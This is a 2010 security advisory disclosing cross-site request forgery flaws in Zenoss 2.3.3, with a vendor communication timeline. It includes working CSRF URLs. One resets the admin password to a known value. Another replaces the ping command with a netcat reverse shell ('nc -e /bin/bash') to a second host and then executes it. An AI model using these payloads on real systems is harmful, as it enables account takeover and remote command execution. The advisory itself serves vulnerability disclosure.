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From:Adam Baldwin <adam_baldwin_(at)_ngenuity-is.com>
Date:19.01.2010
Subject:Zenoss Multiple Admin CSRF

nGenuity Information Services - Security Advisory

  Advisory ID: NGENUITY-2010-002 - Zenoss Multiple Admin CSRF
  Application: Zenoss 2.3.3
       Vendor: Zenoss
Vendor website: http://www.zenoss.com
       Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

 I. BACKGROUND
    Zenoss is a commercial and open source systems and network monitoring tool. Much
    of the applications functionality is accessible via a front end web application.

II. DETAILS

    Multiple CSRF vulnerabilities exist that can allow for arbitrary
    commands to be executed on the Zenoss server as well as reset the Zenoss
    admin password.

    Attack scenario: If an administrator has an active Zenoss
    session and visits one of these links or visits a malicious page that
    contains resources to point to these URL's

    1. Reset user password to a known state Cross-Site Request Forgery CSRF,
    in this case the password is reset to letmein.

       http://172.16.28.5:8080/zport/dmd/ZenUsers/admin?defaultAdminLevel:
int=1&
       defaultAdminRole=ZenUser&defaultPageSize:
int=40&email=&eventConsoleRefresh:
       boolean=True&manage_editUserSettings:
method=Save&netMapStartObject=&pager=&
       password=letmein&sndpassword=letmein&zenScreenName=editUserSetting
s

    2. Change and execute a command CSRF.
    Change the ping command to be a netcat shell out to a remote system. In
    this case an internal system running on port 443

       http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
       /bin/bash 172.16.28.6 443&commandId=ping&description:text=&
       manage_editUserCommand:method=Save&zenScreenName=userCommandDetail

    Execute the new "ping" command:
    http://172.16.28.5:
8080/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping


III. REFERENCES
    [1] - http://www.zenoss.com

IV. VENDOR COMMUNICATION
    3.10.2009 - Vulnerability Discovery
    8.21.2009 - Requested status from vendor
    9.29.2009 - Vendor call (Fix pending)

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